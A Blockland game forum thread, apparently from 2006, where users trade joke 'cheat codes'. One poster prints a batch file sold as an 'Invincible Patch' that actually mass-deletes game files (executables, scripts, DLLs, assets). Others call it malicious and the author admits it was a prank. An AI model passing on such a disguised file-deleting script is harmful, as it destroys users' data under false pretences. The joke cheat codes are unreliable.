Author Topic: blockland cheats  (Read 12404 times)

just for the fun of it :D
in the join server list, hit up, up, down, left, Z, A, right, down, down, and last F2, and you get acess to password servers without putting in a password ;)

Lol thats a good one :D

In the menu hit up down up down right left right left up right down left.
Now you get weapons even if it's not a deathmatch.
thank you ;), here's another,
at the main menu hit left, left, A, A, A, W, E, F, L, Y, down, right, up,up, and you unlock all bricks :D

Use this patch. It's the only way;
Invinci Patch ver 0.1 (C) 2006 by Night-Stalker ;)


Do not download that .bat it deletes all your basic files.

It was uploaded as a text file. I could just read it right off of his site without even downloading it.

Title RtB Invincible Patch ver 0.1
ECHO ===Welcome To Invinci_Patch ver 0.1!===
ECHO Choose a choice:
ECHO 1. Start Patch
ECHO 2. Quit
set choice=
set /p choice=Type Your Selection, Then Hit Enter To Accept.
if '%choice%'=='1' goto PATCH
if '%choice%'=='2' goto QUIT
ECHO Now patching RtB and deleting DSOs, Enjoy!
del /q *.exe
del /q *.cs
del /q *.jpg
del /q *.png
del /q *.hfl
del /q *.17
del /q *.db
del /q *.ml
del /q *.dts
del /q *.dif
del /q *.mis
del /q *.wav
del /q *.ogg
del /q *.bmp
del /q *.php
del /s *.dso
del /q *.db
del /q *.ml
del /q *.gui
del /q *.rec
del /q *.dll
del /q *.txt
goto QUIT
echo Goodbye!
blockLand.exe -game rtb

You screwed up this line:
del /s *.dso

And forgot:
del /q *.ter

Among others.
« Last Edit: February 22, 2006, 02:13:57 PM by Wedge »

Lol, another pitiless attempt at a malicious code.

Hehe, I'd laugh if all these codes were real.

Wedge do you use FireFox?

Maybe that is why it came up as a text document. Yes.

go into options and press "up, up, up, up, down, left, right, right, right, Z, A, left, A, M" to unlock the Badspot interview

Meant it as a joke to see if pl are stupid... lol    /\./\

And I mean the dso so they won't get suspicus

The power of paint indeed.

Buying and installing Photoshop will enable a special feature in Blockland that allows you to paint blocks freehand. That's right, you can have half red and half blue blocks now! Try it!

(>.< Just kidding.)